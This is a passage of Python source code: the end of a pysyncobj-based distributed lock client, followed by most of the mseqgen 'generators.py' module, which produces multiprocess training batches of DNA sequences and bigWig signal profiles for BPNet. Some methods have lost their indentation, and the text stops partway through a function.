    def _autoAcquireThread(self):
        """Background loop: ping the cluster every autoUnlockTime/4 s."""
        print(f"{threading.get_ident()} _autoAcquireThread")
        self.__initialised.set()
        try:
            while True:
                if not self.__mainThread.is_alive():
                    break
                time.sleep(float(self.__autoUnlockTime) / 4.0)
                # only ping when the cluster has an elected leader
                if self.__lockImpl._getLeader() is not None:
                    self.__lockImpl.ping(self.__selfID, time.time())
        except ReferenceError:
            # the owning Lock instance was garbage collected
            pass

    def tryAcquireLock(self, path):
        """Request `path`; success is observed later via isOwned()."""
        self.__lockImpl.acquire(path, self.__selfID, time.time())

    def isAcquired(self, path):
        """True if `path` is held by anyone and not expired."""
        return self.__lockImpl.isAcquired(path, self.__selfID, time.time())

    def isOwned(self, path):
        """True if this client holds `path` and it is not expired."""
        return self.__lockImpl.isOwned(path, self.__selfID, time.time())

    def release(self, path):
        """Give up `path` if this client holds it."""
        self.__lockImpl.release(path, self.__selfID)

    def getStatus(self):
        """Raw pysyncobj status of the underlying replicated object."""
        return self.__lockImpl.getStatus()

    def toggle_verbose(self):
        """Toggle tracing on the replicated lock table."""
        self.__lockImpl.toggle_verbose()

    def onTick(self):
        """Drive one pysyncobj tick without blocking."""
        self.__lockImpl._onTick(timeToWait=0)
|
generators.py | """
This module contains classes for all the sequence data generators
Classes
MSequenceGenerator - The main base class for all generators.
Multi task batch data generation for training deep neural networks
on high-throughput sequencing data of various genomics assays
MBPNetSequenceGenerator - Derives from MSequenceGenerator.
Multi task batch data generation for training BPNet on
high-throughput sequencing data of various genomics assays
IGNORE_FOR_SPHINX_DOCS:
License
MIT License
Copyright (c) 2020 Kundaje Lab
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or
sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the
Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS
OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
IGNORE_FOR_SPHINX_DOCS:
"""
import json
import logging
import multiprocessing as mp
import numpy as np
import os
import pandas as pd
import pyBigWig
import pyfaidx
import random
import re
from mseqgen import sequtils
from mseqgen.exceptionhandler import NoTracebackException
from mseqgen import utils
from queue import Queue
from threading import Thread
class MSequenceGenerator:
""" Multi task batch data generation for training deep neural
networks on high-throughput sequencing data of various
genomics assays
Args:
input_config (dict): python dictionary with information
about the input data. Contains the following keys -
*data (str)*
path to the json file containing task information.
See README for more information on the format of
the json file
*stranded (boolean)*
True if data is stranded
*has_control (boolean)*
True if control data has been included
batch_gen_params (dictionary): python dictionary with batch
generation parameters. Contains the following keys -
*input_seq_len (int)*
length of input DNA sequence
*output_len (int)*
length of output profile
*max_jitter (int)*
maximum value for randomized jitter to offset the
peaks from the exact center of the input
*rev_comp_aug (boolean)*
enable reverse complement augmentation
*negative_sampling_rate (float)*
the fraction of batch_size that determines how many
negative samples are added to each batch
*sampling_mode (str)*
the mode of sampling chromosome positions - one of
['peaks', 'sequential', 'random', 'manual']. In
'peaks' mode the data samples are fetched from the
peaks bed file specified in the json file
input_config['data']. In 'manual' mode, the two
column pandas dataframe containing the chromosome
position information is passed to the 'samples'
argument of the class
*shuffle (boolean)*
specify whether input data is shuffled at the
begininning of each epoch
*mode (str)*
'train', 'val' or 'test'
*num_positions (int)*
specify how many chromosome positions to sample if
sampling_mode is 'sequential' or 'random'. Can be
omitted if sampling_mode is "peaks", has no effect if
present.
*step_size (int)*
specify step size for sampling chromosome positions if
sampling_mode is "sequential". Can be omitted if
sampling_mode is "peaks" or "random", has no effect if
present.
reference_genome (str): the path to the reference genome
fasta file
chrom_sizes (str): path to the chromosome sizes file
chroms (str): the list of chromosomes that will be sampled
for batch generation
num_threads (int): number of parallel threads for batch
generation, default = 10
epochs (int): number of iterations for looping over input
data, default = 1
batch_size (int): size of each generated batch of data,
default = 64
samples (pandas.Dataframe): two column pandas dataframe
with chromosome position information. Required column
names are column 1:'chrom', column 2:'pos'. Use this
parameter if you set batch_gen_params['sampling_mode']
to 'manual'. default = None
**Members**
IGNORE_FOR_SPHINX_DOCS:
_stranded (boolean): True if input data is stranded
_has_control (boolean): True if input data includes
bias/control track
_sampling_mode (str): the mode of sampling chromosome
positions; one of
['peaks', 'sequential', 'random', 'manual'].
_mode (str): 'train', 'val' or 'test'
_tasks (collections.OrderedDict): dictionary of input tasks
taken from input_data json
_num_tasks (int): the number of tasks in 'tasks'
_reference (str): the path to the reference genome fasta
file
_chroms (list): the list of chromosomes that will be sampled
for batch generation
_chrom_sizes_df (pandas.Dataframe): dataframe of the
chromosomes and their corresponding sizes
_num_threads (int): number of parallel threads for batch
generation
_epochs (int): number of iterations for looping over input
data
_batch_size (int): size of each generated batch of data
_input_flank (int): one half of input sequence length
_output_flank (int): one half of output sequence length
_max_jitter (int): the maximum absolute value of jitter to
vary the position of the peak summit to left or right
of the exact center of the input sequence. Range is
-max_jitter to +max_jitter.
_negative_sampling_rate (float): Use a positive value > 0.0
to specify how many negative samples will be added to
each batch. num_negative_samples =
negative_sampling_rate * batch_size. Ignored if
--sampling_mode is not 'peaks', and --mode is not
'train'
_rev_comp_aug (boolean): specify whether reverse complement
augmentation should be applied to each batch of data.
If True, the size of the generated batch is doubled
(i.e batch_size*2 or if negative samples are added then
(batch_size + num_negative_samples)*2). Ignored if
--mode is not 'train'
_shuffle (boolean): if True input data will be shuffled at
the begininning of each epoch
_ready_for_next_epoch (boolean): flag to control batch
generation for the next epoch. The consumer of the
generator is required to send this signal using
'set_ready_for_next_epoch'. This protocol is required
so that excessive and unnecessary batches are not
generated if they will not be consumed
_stop (boolean): flag to indicate that batch generation
should be terminated after the current epoch
_samples (pandas.Dataframe): two column pandas dataframe with
chromosome positions that will be used for generating
batches of data
IGNORE_FOR_SPHINX_DOCS
"""
def __init__(self, input_config, batch_gen_params, reference_genome,
             chrom_sizes, chroms, num_threads=10, epochs=1, batch_size=64,
             samples=None):
    """Initialize the generator; see the class docstring for the
    meaning of every argument.

    Raises:
        NoTracebackException: for missing/invalid files, missing
            batch_gen_params keys, an unknown sampling_mode, or a
            bad 'samples' argument
    """
    #: True if data is stranded
    self._stranded = input_config['stranded']
    #: True if data has controls
    self._has_control = input_config['has_control']
    #: ML task mode 'train', 'val' or 'test'
    self._mode = batch_gen_params['mode']
    #: sampling mode to get chromosome positions
    self._sampling_mode = batch_gen_params['sampling_mode']

    # make sure the input_data json file exists
    if not os.path.isfile(input_config['data']):
        raise NoTracebackException(
            "File not found: {} OR you may have accidentally "
            "specified a directory path.".format(input_config['data']))

    # load the json file
    with open(input_config['data'], 'r') as inp_json:
        try:
            #: dictionary of tasks for training
            self._tasks = json.loads(inp_json.read())
        except json.decoder.JSONDecodeError:
            raise NoTracebackException(
                "Unable to load json file {}. Valid json expected. "
                "Check the file for syntax errors.".format(
                    input_config['data']))

    # check if the reference genome file exists
    if not os.path.isfile(reference_genome):
        # BUG FIX: the path was passed as a second positional arg and
        # the '{}' was never formatted; use .format like the
        # sibling checks
        raise NoTracebackException(
            "File not found: {} OR you may have accidentally "
            "specified a directory path.".format(reference_genome))

    # check if the chrom_sizes file exists
    if not os.path.isfile(chrom_sizes):
        raise NoTracebackException(
            "File not found: {} OR you may have accidentally "
            "specified a directory path.".format(chrom_sizes))

    #: the number of tasks in _tasks
    self._num_tasks = len(list(self._tasks.keys()))
    #: path to the reference genome
    self._reference = reference_genome
    #: dataframe of the chromosomes and their corresponding sizes
    self._chrom_sizes_df = pd.read_csv(
        chrom_sizes, sep='\t', header=None, names=['chrom', 'size'])
    #: list of chromosomes that will be sampled for batch generation
    self._chroms = chroms
    # keep only the rows corresponding to the requested chromosomes
    self._chrom_sizes_df = self._chrom_sizes_df[
        self._chrom_sizes_df['chrom'].isin(self._chroms)]
    # per-chromosome sampling weights, proportional to size
    self._chrom_sizes_df['weights'] = \
        (self._chrom_sizes_df['size'] / self._chrom_sizes_df['size'].sum())

    #: number of parallel threads for batch generation
    self._num_threads = num_threads
    #: number of iterations for looping over input data
    self._epochs = epochs
    #: size of each generated batch of data
    self._batch_size = batch_size

    # rest of batch generation parameters
    #: one half of input sequence length
    self._input_flank = batch_gen_params['input_seq_len'] // 2
    #: one half of output sequence length
    self._output_flank = batch_gen_params['output_len'] // 2
    #: maximum absolute jitter applied around the peak summit
    self._max_jitter = batch_gen_params['max_jitter']
    #: fraction of batch_size drawn as negative samples; ignored
    #: unless sampling_mode == 'peaks' and mode == 'train'
    self._negative_sampling_rate = \
        batch_gen_params['negative_sampling_rate']
    #: if True, reverse complement augmentation doubles each batch;
    #: ignored unless mode == 'train'
    self._rev_comp_aug = batch_gen_params['rev_comp_aug']
    #: if True, shuffle the data at the beginning of each epoch
    self._shuffle = batch_gen_params['shuffle']

    if self._sampling_mode == 'peaks':
        # sample positions from the tasks' peaks.bed files; the
        # 'tasks' dict holds the paths to those files
        self._samples = sequtils.getPeakPositions(
            self._tasks, self._chroms,
            self._chrom_sizes_df[['chrom', 'size']], self._input_flank,
            drop_duplicates=True)
    elif self._sampling_mode == 'sequential':
        if 'num_positions' not in batch_gen_params:
            raise NoTracebackException(
                "Key not found in batch_gen_params_json: 'num_positions'. "
                "Required for sequential sampling mode")
        if 'step_size' not in batch_gen_params:
            raise NoTracebackException(
                "Key not found in batch_gen_params_json: 'step_size'. "
                "Required for sequential sampling mode")
        # sequential positions at regular intervals
        self._samples = sequtils.getChromPositions(
            self._chroms, self._chrom_sizes_df[['chrom', 'size']],
            self._input_flank, mode=self._sampling_mode,
            num_positions=batch_gen_params['num_positions'],
            step=batch_gen_params['step_size'])
        # positions are fixed and equally spaced, so no jitter
        self._max_jitter = 0
    elif self._sampling_mode == 'random':
        if 'num_positions' not in batch_gen_params:
            raise NoTracebackException(
                "Key not found in batch_gen_params_json: 'num_positions'. "
                "Required for random sampling mode")
        # random positions
        self._samples = sequtils.getChromPositions(
            self._chroms, self._chrom_sizes_df[['chrom', 'size']],
            self._input_flank, mode=self._sampling_mode,
            num_positions=batch_gen_params['num_positions'])
        # already random, jitter adds nothing
        self._max_jitter = 0
    elif self._sampling_mode == 'manual':
        # check if the samples parameter has been provided
        if samples is None:
            raise NoTracebackException(
                "If sampling_mode is 'manual', 'samples' parameter"
                "has to be set. Found None.")
        # BUG FIX: this read `pandas.Dataframe`, a NameError — the
        # module is imported as `pd` and the class is `DataFrame`
        if not isinstance(samples, pd.DataFrame) or \
                set(samples.columns.tolist()) != set(['chrom', 'pos']):
            raise NoTracebackException(
                "samples' parameter should be a valid pandas.Dataframe"
                "with two columns 'chrom' and 'pos'")
        #: two column dataframe of positions, ['chrom', 'pos']
        self._samples = samples
    else:
        # fail fast instead of hitting an AttributeError later when
        # self._samples is first used
        raise NoTracebackException(
            "Unknown sampling_mode '{}'. Expected one of "
            "['peaks', 'sequential', 'random', 'manual']".format(
                self._sampling_mode))

    #: size of the input samples before padding
    self._unpadded_samples_size = len(self._samples)

    # pad self._samples with randomly selected rows so its length is
    # an exact multiple of num_threads * batch_size, allowing the
    # batches to be divided equally across generation threads
    exact_multiple = sequtils.round_to_multiple(
        len(self._samples), num_threads * batch_size, smallest=True)
    pad_size = exact_multiple - len(self._samples)
    if pad_size > 0:
        # if pad_size exceeds the number of available samples we must
        # sample the padding rows with replacement
        replace = pad_size > len(self._samples)
        if replace:
            # BUG FIX: the '{}' placeholder was never filled in
            logging.info("mode '{}': Sampling with replacement for "
                         "data padding".format(self._mode))
        # pd.concat replaces DataFrame.append (removed in pandas 2.x)
        self._samples = pd.concat(
            [self._samples,
             self._samples.sample(pad_size, replace=replace)],
            ignore_index=True)

    #: size of the input samples after padding
    self._samples_size = len(self._samples)
    logging.info("mode '{}': Data size (with {} padded rows) - {}".format(
        self._mode, pad_size, len(self._samples)))
def get_input_tasks(self):
"""
The dictionary of tasks loaded from the json file
input_config['data']
Returns:
dict: dictionary of input tasks
"""
return self._tasks
def get_unpadded_samples_len(self):
"""
The number of data samples before padding
Returns:
int: number of data samples before padding
"""
return self._unpadded_samples_size
def get_samples_len(self):
"""
The number of data samples used in batch generation
(after padding)
Returns:
int: number of data samples used in batch generation
"""
return self._samples_size
def len(self):
"""
The number of batches per epoch
Returns:
int: number of batches of data generated in each epoch
"""
return self._samples.shape[0] // self._batch_size
def _generate_batch(self, coords):
    """
    Generate one batch of inputs and outputs

    Abstract hook: concrete generators (e.g. MBPNetSequenceGenerator)
    build the model inputs/outputs for the given coordinates here.

    Args:
        coords (pandas.DataFrame): batch of 'chrom' & 'pos' rows with
            a 'status' column (1 = positive, -1 = negative sample)

    Raises:
        NotImplementedError: always, in this base class
    """
    raise NotImplementedError("Method not implemented. Used a "
                              "derived class.")
def get_name(self):
    """
    Name of the sequence generator

    Abstract hook: derived classes return an identifying string.

    Raises:
        NotImplementedError: always, in this base class
    """
    raise NotImplementedError("Method not implemented. Used a "
                              "derived class.")
def _get_negative_batch(self):
"""
Get chrom positions for the negative samples using
uniform random sampling from across the all chromosomes
in self._chroms
Returns:
pandas.DataFrame:
two column dataframe of chromosome positions with
'chrom' & 'pos' columns
"""
# Step 1: select chromosomes, using sampling weights
# according to sizes
chrom_df = self._chrom_sizes_df.sample(
n=int(self._batch_size * self._negative_sampling_rate),
weights=self._chrom_sizes_df.weights, replace=True)
# Step 2: generate 'n' random numbers where 'n' is the length
# of chrom_df
r = [random.random() for _ in range(chrom_df.shape[0])]
# Step 3. multiply the random numbers with the size column.
# Additionally, factor in the flank size and jitter while
# computing the position
chrom_df['pos'] = ((chrom_df['size'] - ((self._input_flank
+ self._max_jitter) * 2))
* r + self._input_flank
+ self._max_jitter).astype(int)
return chrom_df[['chrom', 'pos']]
def _proc_target(self, coords_df, mpq, proc_idx):
    """
    Function that will be executed in a separate process.
    Takes a dataframe of peak coordinates and parses them in
    batches, to get one hot encoded sequences and corresponding
    outputs, and adds the batches to the multiprocessing queue.
    Optionally, samples negative locations and adds them to
    each batch

    Args:
        coords_df (pandas.DataFrame): dataframe containing
            the chrom & peak pos
        mpq (multiprocessing.Queue): The multiprocessing queue
            to hold the batches
        proc_idx (int): index of this process, for debug logging
    """
    # divide the coordinates dataframe into batches
    cnt = 0
    for i in range(0, coords_df.shape[0], self._batch_size):
        # we need to make sure we dont try to fetch
        # data beyond the length of the dataframe
        if (i + self._batch_size) > coords_df.shape[0]:
            break
        batch_df = coords_df.iloc[i:i + self._batch_size]
        # copy so the 'status' column doesn't mutate coords_df
        batch_df = batch_df.copy()
        # status 1 marks positive (peak-derived) samples
        batch_df['status'] = 1

        # add equal number of negative samples
        if self._mode == "train" and \
                self._sampling_mode == 'peaks' and \
                self._negative_sampling_rate > 0.0:
            neg_batch = self._get_negative_batch()
            # status -1 marks randomly sampled negatives
            neg_batch['status'] = -1
            batch_df = pd.concat([batch_df, neg_batch])

        # generate a batch of one hot encoded sequences and
        # corresponding outputs
        batch = self._generate_batch(batch_df)

        # add batch to the multiprocessing queue
        mpq.put(batch)
        cnt += 1

    logging.debug("{} process {} put {} batches into mpq".format(
        self._mode, proc_idx, cnt))
def _stealer(self, mpq, q, num_batches, thread_id):
"""
Thread target function to "get" (steal) from the
multiprocessing queue and "put" in the regular queue
Args:
mpq (multiprocessing.Queue): The multiprocessing queue
to steal from
q (Queue): The regular queue to put the batch into
num_batches (int): the number of batches to "steal"
from the mp queue
thread_id (int): thread id for debugging purposes
"""
for i in range(num_batches):
q.put(mpq.get())
logging.debug("{} stealer thread {} got {} batches from mpq".format(
self._mode, thread_id, num_batches))
def _epoch_run(self, data):
    """
    Manage batch generation processes & threads
    for one epoch

    Spawns up to num_threads worker processes, each producing
    batches into its own multiprocessing queue, plus one "stealer"
    thread per active process that moves those batches into a
    single regular queue.

    Args:
        data (pandas.DataFrame): dataframe with 'chrom' &
            'pos' columns

    Returns:
        tuple: (procs, threads, q, total_batches) — the process and
            thread lists (with None placeholders for idle slots),
            the Queue batches arrive on, and the total number of
            batches that will be produced this epoch
    """
    # list of processes that are spawned
    procs = []
    # list of multiprocessing queues corresponding to each
    # process
    mp_queues = []
    # list of stealer threads (that steal the items out of
    # the mp queues)
    threads = []
    # the regular queue
    q = Queue()
    # to make sure we dont flood the user with warning messages
    warning_dispatched = False
    # number of data samples to assign to each processor
    # (since we have already padded data len(data) is directly
    # divisible by num_threads)
    samples_per_processor = int(len(data) / self._num_threads)
    # batches that will be generated by each process thread
    num_batches = []
    # spawn processes that will generate batches of data and "put"
    # into the multiprocessing queues
    for i in range(self._num_threads):
        mpq = mp.Queue()
        # give each process a slice of the dataframe of positives
        df = data[i * samples_per_processor:
                  (i + 1) * samples_per_processor][['chrom', 'pos']]
        # the last process gets the leftover data points
        if i == (self._num_threads - 1):
            df = pd.concat([df, data[(i + 1) * samples_per_processor:]])
        num_batches.append(len(df) // self._batch_size)
        if df.shape[0] != 0:
            logging.debug("{} spawning process {}, df size {}, "
                          "sum(num_batches) {}".format(
                              self._mode, i, df.shape, sum(num_batches)))
            # spawn and start the batch generation process
            p = mp.Process(target=self._proc_target, args=[df, mpq, i])
            p.start()
            procs.append(p)
            mp_queues.append(mpq)
        else:
            if not warning_dispatched:
                logging.warn("One or more process threads are not being "
                             "assigned data for parallel batch "
                             "generation. You should reduce the number "
                             "of threads using the --threads option "
                             "for better performance. Inspect logs for "
                             "batch assignments.")
                warning_dispatched = True
            logging.debug("{} skipping process {}, df size {}, "
                          "num_batches {}".format(
                              self._mode, i, df.shape, sum(num_batches)))
            # keep list positions aligned with the slot index
            procs.append(None)
            mp_queues.append(None)
    logging.debug("{} num_batches list {}".format(self._mode,
                                                  num_batches))
    # the threads that will "get" from mp queues
    # and put into the regular queue
    # this speeds up yielding of batches, because "get"
    # from mp queue is very slow
    for i in range(self._num_threads):
        # start a stealer thread only if data was assigned to
        # the i-th process
        if num_batches[i] > 0:
            logging.debug("{} starting stealer thread {} [{}] ".format(
                self._mode, i, num_batches[i]))
            mp_q = mp_queues[i]
            stealerThread = Thread(target=self._stealer,
                                   args=[mp_q, q, num_batches[i], i])
            stealerThread.start()
            threads.append(stealerThread)
        else:
            threads.append(None)
            logging.debug("{} skipping stealer thread {} ".format(
                self._mode, i, num_batches))
    return procs, threads, q, sum(num_batches)
def gen(self, epoch):
    """
    Generator function to yield one batch of data

    Args:
        epoch (int): the epoch number

    Yields:
        the batches produced by `_generate_batch`, in the order the
        worker processes deliver them
    """
    if self._shuffle:
        # shuffle at the beginning of each epoch
        data = self._samples.sample(frac=1.0)
        logging.debug("{} Shuffling complete".format(self._mode))
    else:
        data = self._samples

    # spawn multiple processes to generate batches of data in
    # parallel for each epoch
    procs, threads, q, total_batches = self._epoch_run(data)
    logging.debug("{} Batch generation for epoch {} started".format(
        self._mode, epoch))

    # yield the correct number of batches for each epoch
    for j in range(total_batches):
        batch = q.get()
        yield batch

    # wait for batch generation processes to finish once the
    # required number of batches have been yielded
    for j in range(self._num_threads):
        if procs[j] is not None:
            logging.debug("{} waiting to join process {}".format(
                self._mode, j))
            procs[j].join()
        if threads[j] is not None:
            logging.debug("{} waiting to join thread {}".format(
                self._mode, j))
            threads[j].join()
        logging.debug("{} join complete for process {}".format(
            self._mode, j))
    logging.debug("{} Finished join for epoch {}".format(
        self._mode, epoch))
    logging.debug("{} Ready for next epoch".format(self._mode))
class MBPNetSequenceGenerator(MSequenceGenerator):
    """
    Multi task batch data generation for training BPNet
    on high-throughput sequencing data of various
    genomics assays

    Args:
        input_config (dict): python dictionary with information
            about the input data. Contains the following keys -
            *data (str)*
                path to the json file containing task information.
                See README for more information on the format of
                the json file
            *stranded (boolean)*
                True if data is stranded
            *has_control (boolean)*
                True if control data has been included
        batch_gen_params (dictionary): python dictionary with batch
            generation parameters. Contains the following keys -
            *input_seq_len (int)*
                length of input DNA sequence
            *output_len (int)*
                length of output profile
            *max_jitter (int)*
                maximum value for randomized jitter to offset the
                peaks from the exact center of the input
            *rev_comp_aug (boolean)*
                enable reverse complement augmentation
            *negative_sampling_rate (float)*
                the fraction of batch_size that determines how many
                negative samples are added to each batch
            *sampling_mode (str)*
                the mode of sampling chromosome positions - one of
                ['peaks', 'sequential', 'random', 'manual']. In
                'peaks' mode the data samples are fetched from the
                peaks bed file specified in the json file
                input_config['data']. In 'manual' mode, the bed
                file containing the chromosome position information
                is passed to the 'samples' argument of the class
            *shuffle (boolean)*
                specify whether input data is shuffled at the
                beginning of each epoch
            *mode (str)*
                'train', 'val' or 'test'
            *num_positions (int)*
                specify how many chromosome positions to sample if
                sampling_mode is 'sequential' or 'random'. Can be
                omitted if sampling_mode is "peaks", has no effect if
                present.
            *step_size (int)*
                specify step size for sampling chromosome positions if
                sampling_mode is "sequential". Can be omitted if
                sampling_mode is "peaks" or "random", has no effect if
                present.
        reference_genome (str): the path to the reference genome
            fasta file
        chrom_sizes (str): path to the chromosome sizes file
        chroms (str): the list of chromosomes that will be sampled
            for batch generation
        num_threads (int): number of parallel threads for batch
            generation
        epochs (int): number of iterations for looping over input
            data
        batch_size (int): size of each generated batch of data
        samples (pandas.Dataframe): two column pandas dataframe
            with chromosome position information. Required column
            names are column 1:'chrom', column 2:'pos'. Use this
            parameter if you set batch_gen_params['sampling_mode']
            to 'manual'. default = None
        kwargs (dictionary): python dictionary containing
            parameters specific to BPNet. Contains the following
            keys -
            *name (str)*
                model architecture name
            *filters (int)*
                number of filters for BPNet
            *control_smoothing (list)*
                nested list of gaussian smoothing parameters. Each
                inner list has two values - [sigma, window_size] for
                supplemental control tracks

    **Members**

    IGNORE_FOR_SPHINX_DOCS:
        Attributes:
            _control_smoothing (list): nested list of gaussian smoothing
                parameters. Each inner list has two values -
                [sigma, window_size] for supplemental control tracks

    IGNORE_FOR_SPHINX_DOCS
    """

    def __init__(self, input_config, batch_gen_params, reference_genome,
                 chrom_sizes, chroms, num_threads=10, epochs=100,
                 batch_size=64, samples=None, **kwargs):
        # name of the generator class
        self.name = "BPNet"

        # call base class constructor
        super().__init__(input_config, batch_gen_params, reference_genome,
                         chrom_sizes, chroms, num_threads, epochs, batch_size,
                         samples)

        # 'control_smoothing' is mandatory for BPNet batch generation
        if 'control_smoothing' not in kwargs:
            raise NoTracebackException(
                "Key not Found: missing 'control_smoothing' parameter")

        #: nested list of gaussian smoothing parameters. Each inner list
        #: has two values - [sigma, window_size] for supplemental
        #: control tracks
        self._control_smoothing = kwargs['control_smoothing']

    def _generate_batch(self, coords):
        """Generate one batch of inputs and outputs for training BPNet

        For all coordinates in "coords" fetch sequences &
        one hot encode the sequences. Fetch corresponding
        signal values (for e.g. from a bigwig file).
        Package the one hot encoded sequences and the output
        values as a tuple.

        Args:
            coords (pandas.DataFrame): dataframe with 'chrom',
                'pos' & 'status' columns specifying the chromosome,
                the coordinate and whether the loci is a positive(1)
                or negative sample(-1)

        Returns:
            tuple:
                When 'mode' is 'train' or 'val' a batch tuple
                with one hot encoded sequences and corresponding
                outputs and when 'mode' is 'test' tuple of
                coordinates & the inputs
        """
        # reference file to fetch sequences
        fasta_ref = pyfaidx.Fasta(self._reference)

        # Initialization
        # (batch_size, output_len, 1 + #smoothing_window_sizes)
        control_profile = np.zeros((coords.shape[0], self._output_flank * 2,
                                    1 + len(self._control_smoothing)),
                                   dtype=np.float32)
        # (batch_size)
        control_profile_counts = np.zeros((coords.shape[0]),
                                          dtype=np.float32)

        # in 'test' mode we pass the true profile as part of the
        # returned tuple from the batch generator
        if self._mode == "train" or self._mode == "val" or \
                self._mode == "test":
            # (batch_size, output_len, #tasks)
            profile = np.zeros((coords.shape[0], self._output_flank * 2,
                                self._num_tasks), dtype=np.float32)
            # (batch_size, #tasks)
            profile_counts = np.zeros((coords.shape[0], self._num_tasks),
                                      dtype=np.float32)

        # if reverse complement augmentation is enabled then double the sizes
        # (first half holds the originals, second half the rev-comp copies)
        if self._mode == "train" and self._rev_comp_aug:
            control_profile = control_profile.repeat(2, axis=0)
            control_profile_counts = control_profile_counts.repeat(2, axis=0)
            profile = profile.repeat(2, axis=0)
            profile_counts = profile_counts.repeat(2, axis=0)

        # list of sequences in the batch, these will be one hot
        # encoded together as a single sequence after iterating
        # over the batch
        sequences = []

        # list of chromosome start/end coordinates
        # useful for tracking test batches
        coordinates = []

        # open all the control bigwig files and store the file
        # objects in a dictionary
        control_files = {}
        for task in self._tasks:
            # the control is not necessary
            if 'control' in self._tasks[task]:
                control_files[task] = pyBigWig.open(
                    self._tasks[task]['control'])

        # in 'test' mode we pass the true profile as part of the
        # returned tuple from the batch generator
        if self._mode == "train" or self._mode == "val" or \
                self._mode == "test":
            # open all the required bigwig files and store the file
            # objects in a dictionary
            signal_files = {}
            for task in self._tasks:
                signal_files[task] = pyBigWig.open(self._tasks[task]['signal'])

        # iterate over the batch
        rowCnt = 0
        for _, row in coords.iterrows():
            # randomly set a jitter value to move the peak summit
            # slightly away from the exact center
            jitter = 0
            if self._mode == "train" and self._max_jitter:
                jitter = random.randint(-self._max_jitter, self._max_jitter)

            # Step 1 get the sequence
            chrom = row['chrom']
            # we use self._input_flank here and not self._output_flank because
            # input_seq_len is different from output_len
            start = row['pos'] - self._input_flank + jitter
            end = row['pos'] + self._input_flank + jitter
            seq = fasta_ref[chrom][start:end].seq.upper()

            # collect all the sequences into a list
            sequences.append(seq)

            # start/end are re-bound here to the (narrower) output window
            start = row['pos'] - self._output_flank + jitter
            end = row['pos'] + self._output_flank + jitter

            # collect all the start/end coordinates into a list
            # we'll send this off along with 'test' batches
            coordinates.append((chrom, start, end))

            # iterate over each task
            for task in self._tasks:
                # identifies the +/- strand pair
                task_id = self._tasks[task]['task_id']
                # the strand id: 0-positive, 1-negative
                # easy to index with those values
                strand = self._tasks[task]['strand']

                # Step 2. get the control values
                if task in control_files:
                    control_values = control_files[task].values(
                        chrom, start, end)

                    # replace nans with zeros
                    if np.any(np.isnan(control_values)):
                        control_values = np.nan_to_num(control_values)

                    # update row in batch with the control values
                    # the values are summed across all tasks
                    # the axis = 1 dimension accumulates the sum
                    # there are 'n' copies of the sum along axis = 2,
                    # n = #smoothing_windows
                    control_profile[rowCnt, :, :] += np.expand_dims(
                        control_values, axis=1)

                # in 'test' mode we pass the true profile as part of the
                # returned tuple from the batch generator
                if self._mode == "train" or self._mode == "val" or \
                        self._mode == "test":
                    # Step 3. get the signal values
                    # fetch values using the pyBigWig file objects
                    values = signal_files[task].values(chrom, start, end)

                    # replace nans with zeros
                    if np.any(np.isnan(values)):
                        values = np.nan_to_num(values)

                    # update row in batch with the signal values
                    if self._stranded:
                        profile[rowCnt, :, task_id * 2 + strand] = values
                    else:
                        profile[rowCnt, :, task_id] = values

            rowCnt += 1

        # Step 4. reverse complement augmentation
        if self._mode == "train" and self._rev_comp_aug:
            # Step 4.1 get list of reverse complement sequences
            rev_comp_sequences = \
                sequtils.reverse_complement_of_sequences(sequences)

            # append the rev comp sequences to the original list
            sequences.extend(rev_comp_sequences)

            # Step 4.2 reverse complement of the control profile
            control_profile[rowCnt:, :, :] = \
                sequtils.reverse_complement_of_profiles(
                    control_profile[:rowCnt, :, :], self._stranded)

            # Step 4.3 reverse complement of the signal profile
            profile[rowCnt:, :, :] = \
                sequtils.reverse_complement_of_profiles(
                    profile[:rowCnt, :, :], self._stranded)

        # Step 5. one hot encode all the sequences in the batch
        if len(sequences) == profile.shape[0]:
            X = sequtils.one_hot_encode(sequences, self._input_flank * 2)
        else:
            raise NoTracebackException(
                "Unable to generate enough sequences for the batch")

        # we can perform smoothing on the entire batch of control values
        for i in range(len(self._control_smoothing)):
            sigma = self._control_smoothing[i][0]
            window_size = self._control_smoothing[i][1]

            # its i+1 because at index 0 we have the original
            # control
            control_profile[:, :, i + 1] = utils.gaussian1D_smoothing(
                control_profile[:, :, i + 1], sigma, window_size)

        # log of sum of control profile without smoothing (idx = 0)
        control_profile_counts = np.log(
            np.sum(control_profile[:, :, 0], axis=-1) + 1)

        # in 'train' and 'val' mode we need input and output
        # dictionaries
        if self._mode == "train" or self._mode == 'val':
            # we can now sum the profiles for the entire batch
            profile_counts = np.log(np.sum(profile, axis=1) + 1)

            # return a tuple of input and output dictionaries
            # 'coordinates' and 'status are not inputs to the model,
            # so you will see a warning about unused inputs while
            # training. It's safe to ignore the warning
            # We pass 'coordinates' so we can track the exact
            # coordinates of the inputs (because jitter is random)
            # 'status' refers to whether the data sample is a +ve (1)
            # or -ve (-1) example and is used by the attribution
            # prior loss function
            return ({'coordinates': coordinates,
                     'status': coords['status'].values,
                     'sequence': X,
                     'control_profile': control_profile,
                     'control_logcount': control_profile_counts},
                    {'profile_predictions': profile,
                     'logcount_predictions': profile_counts})

        # in 'test' mode return a tuple of coordinates, true profiles
        # & the input dictionary
        # NOTE(review): the bigwig/fasta handles opened above are never
        # closed -- presumably relying on garbage collection; confirm.
        return (coordinates, profile,
                {'sequence': X,
                 'control_profile': control_profile,
                 'control_logcount': control_profile_counts})
def list_generator_names():
    """
    List all available sequence generators that are derived
    classes of the base class MSequenceGenerator

    Subclasses whose names do not follow the M<Name>SequenceGenerator
    convention are skipped.

    Returns:
        list: list of sequence generator names
    """
    generator_names = []
    for c in MSequenceGenerator.__subclasses__():
